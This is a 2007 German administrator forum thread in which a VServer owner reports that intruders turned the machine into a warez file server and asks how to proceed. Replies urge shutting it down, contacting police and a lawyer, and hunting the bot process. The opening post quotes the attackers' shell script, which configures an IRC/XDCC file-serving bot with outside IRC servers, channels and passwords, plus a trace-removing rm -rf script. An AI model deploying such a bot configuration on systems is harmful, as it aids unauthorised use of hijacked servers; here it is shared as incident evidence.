mesche
May 06, 2007, updated at May 12, 2007 (UTC)
view8330
view9
0
Goto Top

VServer als Fileserver benutzt

GermanQuestionServerInternet
Hi,
hoffe Ihr könnt mir helfen.
Ich habe seit kurzem einen VServer bei Strato, dieser wurde von irgendwelchen Kiddies gehackt und als Fileserver benutzt. Habe schon die Pfade raus bekommen, wo diese sachen liegen.
So wie ich das jetzt sehe haben die ein Script ausgeführt (Dummerweise war mein SafeMode off) und somit die Files hochgeladen.

In meiner Log Datei habe ich folgende Logs gefunden.

Mar 30 15:49:52 h8xxxxx proftpd[6076]: h8xxxxx.serverkompetenz.net (85.xx.xx.xx[85.xx.xxx.xx])) - no such user 'web5'
Mar 30 15:49:52 h8xxxxx proftpd[6076]: h8xxxxx .serverkompetenz.net (85.xx.xx.xx[85.xx.xxx.xx]) - USER web5: no such user found from 85.xx.xx.xx [85.xx.xx.xx] to 85.xx.xx.xx:21


Wenn ich diese Ordner lösche dann funktioniert irgendwie gar nix mehr (ssh zugang geht nicht mehr und Apache ist auch nicht mehr erreichbar)

Folgendes File hab ich noch gefunden

#!/bin/sh
echo "statefile Infodll.state" >> conf.txt;
echo "statefile mybot.state" >> conf.txt;
echo "connectionmethod direct" >> conf.txt;
echo "server franco.ns0.it 6666" >> conf.txt;
echo "server franco.ns0.it 6667" >> conf.txt;
echo "server franco.ns0.it 6668" >> conf.txt;
echo "server franco.ns0.it 6669" >> conf.txt;
echo "server franco.ns0.it 7000" >> conf.txt;
echo "server irc.toxic-power.net 6666" >> conf.txt;
echo "server irc.toxic-power.net 6667" >> conf.txt;
echo "server irc.toxic-power.net 6668" >> conf.txt;
echo "server irc.toxic-power.net 7000" >> conf.txt;
echo "channel ###r00t###" >> conf.txt;
echo "channel #toxic" >> conf.txt;
echo "channel $2" >> conf.txt;
echo "user_nick ToXiC|$1" >> conf.txt;
echo "nickserv_pass c0c41n4">> conf.txt;
echo "adminpass zSvOExY4a/k1U">>conf.txt;
echo "#local_vhost 123.456.789.123" >> conf.txt;
echo "#tcprangestart 4000" >> conf.txt;
echo "#usenatip 123.456.789.123" >> conf.txt;
echo "user_realname ...::::9ToXiC CrEw::::..." >> conf.txt;
echo "user_modes +ix" >> conf.txt;
echo "loginname ToXiC" >> conf.txt;
echo "slotsmax 10" >> conf.txt;
echo "queuesize 30" >> conf.txt;
echo "maxtransfersperperson 1" >> conf.txt;
echo "maxqueueditemsperperson 2" >> conf.txt;
echo "restrictlist yes" >> conf.txt;
echo "restrictprivlist yes" >> conf.txt;
echo "restrictsend yes" >> conf.txt;
echo "restrictprivlistmsg Per la lista http://ToXiCWaReZ.Altervista.Org; >> conf.txt;
echo "respondtochannelxdcc no" >> conf.txt;
echo "respondtochannellist no" >> conf.txt;
echo "headline [9T9o9X9i9C 9C9r9E9w]..::9The Best Way For Sharing::..0®" >> conf.txt;
echo "creditline [9T9o9X9i9C 9C9r9E9w]..::9The Best Way For Sharing::..0®" >> conf.txt;
echo "adminhost *!*@ToXiC.CrEw" >> conf.txt;
echo "uploadhost *!*@ToXiC.CrEw" >> conf.txt;
echo "uploadhost *!*@T.o.X.i.C" >> conf.txt;
echo "downloadhost *!*@*.*" >> conf.txt;
echo "hideos yes" >> conf.txt;
echo "filedir `pwd`" >> conf.txt;
echo "uploaddir `pwd`" >> conf.txt;
echo "#!/bin/sh">>remove;
echo "rm -rf linux.tar;rm -rf remove">>remove;
chmod 777 remove;
ls -la;

zusätzlich fande ich noch das Programm "ftpd"


Wie genau soll ich jetzt vorgehen! Die Daten sichern und zur Anzeige bringen ??

würde mich über hilfe freuen
Gruß
Esche
comment-contentCommentShareShare
Share on Facebook Share on Twitter Share on Reddit Share on Linkedin

Content-Key: 58382

Url: https://administrator.de/contentid/58382

Printed on: April 25, 2024 at 17:04 o'clock

9 Comments
Latest comment
Goto Top
Member: thekingofqueens
thekingofqueens May 06, 2007 at 14:23:26 (UTC)
Goto Top
Wenn du wirklich vor hast zur Polizei zu gehen dann einfach den Server abschalten. Nichts verändern. Strato Bescheid sagen. Zur Polizei gehen, vorher noch Rechtsanwalt nehmen.
Mitglied: 16568
16568 May 06, 2007 at 17:47:52 (UTC)
Goto Top
PERFEKTE ANTWORT!!!


Lonesome Walker
Member: erikro
erikro May 06, 2007 at 18:00:33 (UTC)
Goto Top
Hallo zusammen,

sieht aus, als hätte Dir jemand einen IRC-Bot untergejubelt.

Was heißt es geht nichts mehr wenn Du welche Ornder löschst?

Der recht spärliche Auszug aus dem log file sagt nur, dass sich ein user mit dem Namen web5 versucht hat anzumelden, was ihm nicht gelungen ist. Das kann also nichts damit zu tun haben.

Zur Staatsanwaltschaft zu laufen ist m. E. mit viel Ärger und viel Zeit verbunden. Ob's was bringt, ist die zweite Frage. Mir hat auch mal jemand eine Tauschbörse untergejubelt auf einem Server, den ich glücklicherweise gerade erst übernommen hatte und sowieso komplett neu machen sollte. Bzw. nach dem Angriff war klar, dass alles neu gemacht werden muss. Wir haben damals auf eine Anzeige verzichtet.

Allerdings hast Du spätestens jetzt Kenntnis von der Sache und musst demzufolge umgehend Gegenmaßnahmen ergreifen. Unterlässt Du das, dann steht die Staatsanwaltschaft evtl. bei Dir vor der Tür und zwar morgens um sechs und nimmt erst einmal alles mit, was irgendwie nach Computer aussieht. Das kann Dir übrigens auch passieren, wenn Du Dich doch zur Strafanzeige entschließt. Deshalb auch von mir der dringende Rat, einen Anwalt hinzuzuziehen. In Berlin und Hamburg wüsste ich einen entsprechenden Fachanwalt.

Auf jeden Fall musst Du den Prozess suchen, unter dem der Bot läuft. Weißt Du wie das geht? Was ist das denn eigentlich für ein Server? Linux, vermute ich. Welches Linux? Strato bietet afaik Suse und Debian an.

Dann musst Du den Prozess killen und suchen, ob er irgendwie automatisch gestartet wird. Ich empfehle beim suchen auch mal den Parameter forest bei ps (man ps hilft ungemein ;) )zu benutzen. Evtl. ist der eigentliche Bot-Prozess ein Kindprozess eines anderen. Evtl. ist das klug programmiert, so dass der Elternprozess den Bot erst nach einer Weile vielleicht erst nach Stunden wieder startet.

Wenn Du das nicht innerhalb kürzester Zeit gelingt, Du nicht in der Lage dazu bist oder Du Dich zu einer Strafanzeige entschließen solltest bzw. noch nicht genau weißt, ob Du das willst, dann würde ich schleunigst bei Strato anzurufen und das Ding vom Netz nehmen zu lassen.

Liebe Grüße

Erik
Mitglied: 16568
16568 May 06, 2007 at 18:11:37 (UTC)
Goto Top
Ein gut gemeinter Rat von mir:

Server sofort ausschalten, von mir aus auch abwürgen.
Verfahren dann wie von thekingofqueens vollziehen.
Gebrabbel von erik ignorieren.


Polizei ist ein MUSS!!!


Lonesome Walker
(Mod Webserver, Hacker und Co. und im Real-Life ein Mann für den Bereich Sicherheit face-wink )
Member: mesche
mesche May 11, 2007 at 20:46:37 (UTC)
Goto Top
Hallo,
vielen Dank für die Antworten! Find ich echt super, dass man hier Hilfe bekommt (ist in vielen anderen Foren nicht so)
Hab sogar ein schlechtes Gewissen, dass ich nicht früher Antworten konnte, dies war mir jedoch nicht möglich.

Ich habe jetzt das getan, was man eigentlich nicht tun sollte. Hab alles gelöscht, Server neu aufgespielt usw....

Eigentlich habt Ihr recht, normal müsste ich zur Polizei. Ich weiß aber auch wie das mit der "möchtegern Szene" läuft und da wird gescannt und gehackt was das Zeug hält und jemanden etwas konkret nachzuweisen ist ziemlich unmöglich (auch wenn die Daten nachweisbar sind).

Wovor ich mehr Angst habe ist, dass ich bald wieder gehackt werde, denn normal werden gute Server wieder versucht "zurück zu hacken" (auch wenn das ziemlich idiotisch ist) Sollte sowas wirklich passieren werde ich aufjedenfall den rechtlichen Weg suchen.

Schönes Wochenende euch allen
Gruß

Esche
Mitglied: 16568
16568 May 12, 2007 at 08:15:10 (UTC)
Goto Top
Ich habe jetzt das getan, was man eigentlich
nicht tun sollte. Hab alles gelöscht,
Server neu aufgespielt usw....

Tja, warum antowrten wir dann überhaupt noch "Usern" wie Dir?

Eigentlich habt Ihr recht, normal
müsste ich zur Polizei. Ich weiß
aber auch wie das mit der
"möchtegern Szene" läuft
und da wird gescannt und gehackt was das Zeug
hält und jemanden etwas konkret
nachzuweisen ist ziemlich unmöglich
(auch wenn die Daten nachweisbar sind).

Darüber lache ich dann doch; denn wäre ich derjenige gewesen, der Deinen Server übernommen hat, Du hättest nicht mal was mitgekriegt (rootkit).

Wovor ich mehr Angst habe ist, dass ich bald
wieder gehackt werde, denn normal werden gute
Server wieder versucht "zurück zu
hacken" (auch wenn das ziemlich
idiotisch ist) Sollte sowas wirklich
passieren werde ich aufjedenfall den
rechtlichen Weg suchen.

Dann ist es schon zu spät, denn dann kriegst Du auch blöde Sprüche von der Polizei, warum Du nicht früher hingegangen bist.

Sag mal, warum glaubst Du, schreiben wir Dir:
Geh zur Polizei!

Aus Spaß? Weil uns langweilig ist?

Klar wird Dein Server neu penetriert werden, denn der letzte erfolgreiche Hacker wird sagen:

Der war schon einmal so blöd, der wird es wieder sein!


Das weiß auch die Polizei, und meist stellen die dann einen Honeypot auf (zumindest macht das einer von denen, die ich kenne...)

Viel Spaß mit Deinen weiteren gehackten Büchsen.
Nicht jeder ist in der Lage, mit dieser Verantwortung umzugehen.


Lonesome Walker
Member: mesche
mesche May 12, 2007 at 11:53:59 (UTC)
Goto Top
Naja leicht reden habt Ihr...

Was soll ich sagen?
Das ist ein privater VServer.
Wie sollte denn einen Anwalt bezahlen?
Was mache ich solange mein VServer nicht läuft? (einen 2. Mieten wäre zu teuer)
Wer zahlt denn die Arbeitsausfälle die (sicherlich) entstehen werden würden

Member: thekingofqueens
thekingofqueens May 12, 2007 at 12:13:18 (UTC)
Goto Top
Eins versteh ich nicht, der Server ist privat. Aber es entstehen Arbeitsausfälle? Was ist, wenn mit dem Server Schabernack getrieben wurde und sich nun der Anwalt eines Geschädigten an dich wendet?
Member: mesche
mesche May 12, 2007 at 12:18:44 (UTC)
Goto Top
Eins versteh ich nicht, der Server ist
privat. Aber es entstehen
Arbeitsausfälle? Was ist, wenn mit dem
Server Schabernack getrieben wurde und sich
nun der Anwalt eines Geschädigten an
dich wendet?

hab mich etwas undeutlich ausgedrückt!
Ich bin im moment ziemlich in meiner Arbeit eingespannt und hab deshalb auch nicht wirklich zeit mich mit Polizei Anwalt etc. aueinander zu setzen..

Mit dem anderen hast du wohl recht das es dann ein Problem gibt
GermanQuestionServerInternet
Hotly discussed
gleixnerdCheck of ZFW Firewallgleixnerd - 5 Comments